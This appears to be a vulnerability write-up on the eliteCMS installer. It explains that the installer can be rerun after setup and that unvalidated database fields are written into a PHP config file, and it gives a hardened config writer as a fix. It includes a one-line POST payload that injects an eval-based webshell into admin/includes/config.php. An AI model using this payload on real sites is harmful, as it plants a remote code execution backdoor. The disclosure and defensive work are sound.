The eliteCMS installer is not locked after installation finishes, so an attacker who visits the installer URL can simply run the installation again.
A second vulnerability: the installer writes a one-line PHP backdoor (webshell) straight into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // session values are interpolated unescaped into the generated PHP source
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...
Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

the one-line backdoor is written into /admin/includes/config.php.
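As an added example (not eliteCMS's own code), here is a hardened version of the step-4 config writer: it refuses to run once an install.lock marker (an assumed file name) exists, whitelists the host, database and user values, and emits every value through var_export() so it is always a quoted PHP string literal rather than raw text spliced into source.

```php
<?php
// Added example, not eliteCMS code. Assumed names: install.lock as the
// "already installed" marker; the config path is the one from the post.
const CONFIG_FILE = __DIR__ . '/../admin/includes/config.php';
const LOCK_FILE   = __DIR__ . '/install.lock';

// Refuse to run the installer again once a previous run completed.
function installerIsLocked(): bool {
    return file_exists(LOCK_FILE);
}

// Host, database and user names get a strict character whitelist; quotes,
// "?>", "<?php" and whitespace are all rejected before anything is written.
function validDbIdentifier(string $value, int $maxLen = 64): bool {
    return $value !== '' && strlen($value) <= $maxLen
        && preg_match('/^[A-Za-z0-9_.:-]+$/', $value) === 1;
}

// Build the config body. var_export() emits a properly quoted, escaped PHP
// string literal, so even the unrestricted password cannot break out of it.
function buildConfig(array $db): string {
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER'] as $key) {
        if (!validDbIdentifier((string) ($db[$key] ?? ''))) {
            throw new InvalidArgumentException("invalid value for $key");
        }
    }
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $literal = var_export((string) ($db[$key] ?? ''), true);
        $out .= "define('$key', $literal);\n";
    }
    return $out; // no closing "?>": nothing can follow the PHP block
}

// Write atomically (temp file + rename) and lock the installer right after.
function writeConfig(array $db): void {
    if (installerIsLocked()) {
        http_response_code(403);
        exit('Installer is locked; remove install.lock to reinstall.');
    }
    $tmp = CONFIG_FILE . '.tmp';
    if (file_put_contents($tmp, buildConfig($db), LOCK_EX) === false
        || !rename($tmp, CONFIG_FILE)) {
        throw new RuntimeException('cannot write config file');
    }
    file_put_contents(LOCK_FILE, date('c') . "\n");
}
```

The step-4 branch would call writeConfig($_POST) (or the session copy of it); a DB_NAME containing a quote or PHP tag is rejected before the file is touched, and a second visit to the installer stops at the lock check.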